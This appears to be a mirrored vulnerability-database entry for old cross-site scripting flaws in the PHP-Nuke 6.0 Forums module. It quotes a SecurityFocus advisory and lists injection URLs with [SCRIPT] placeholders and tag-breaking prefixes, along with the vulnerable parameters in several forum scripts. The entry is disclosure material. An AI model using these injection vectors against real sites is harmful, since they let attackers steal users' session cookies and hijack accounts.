PHP-Nuke 6.0 – Multiple Cross-Site Scripting Vulnerabilities

PHP-Nuke 6.0 – Multiple Cross-Site Scripting Vulnerabilities

漏洞ID 1053659 漏洞类型
发布时间 2002-12-16 更新时间 2002-12-16
图片[1]-PHP-Nuke 6.0 – Multiple Cross-Site Scripting Vulnerabilities-安全小百科CVE编号 N/A
图片[2]-PHP-Nuke 6.0 – Multiple Cross-Site Scripting Vulnerabilities-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22103
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/6409/info

It has been discovered that multiple PHP scripts used by PHP-Nuke are vulnerable to cross-sitescripting attacks. Due to insufficient sanitization of web requests it is possible for script code to be embedded in PHP script requests.

By constructing a malicious link which exploits one of these vulnerabilities, it may be possible to execute arbitrary code within the context of a website visited by an unsuspecting user. This may allow a remote attacker to steal cookie-based authentication credentials, which could be used at a later time to hijack a users web session. 

http://[target]/modules/Forums/bb_smilies.php?name=[SCRIPT]
http://[target]/modules/Forums/bb_smilies.php?Default_Theme=[SCRIPT]
http://[target]/modules/Forums/bb_smilies.php?site_font=}--></style>[SCRIPT]
http://[target]/modules/Forums/bb_smilies.php?bgcolor1=">[SCRIPT]
or with :
$sitename
$table_width
$color1
$forumver

/modules/Forums/bbcode_ref.php with :
$name
$Default_Theme
$site_font
$sitename
$bgcolor2
$textcolor1
$bgcolor1
$forumver

/modules/Forums/editpost.php, /modules/Forums/newtopic.php,
/modules/Forums/reply.php, /modules/Forums/topicadmin.php,
/modules/Forums/viewforum.php with :
$name

/modules/Forums/searchbb.php with :
$name
$bgcolor3
$bgcolor1

相关推荐: Microsoft Windows 2000 RunAs User Credentials Exposure Vulnerability

Microsoft Windows 2000 RunAs User Credentials Exposure Vulnerability 漏洞ID 1102732 漏洞类型 Design Error 发布时间 2001-11-12 更新时间 2001-11-1…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享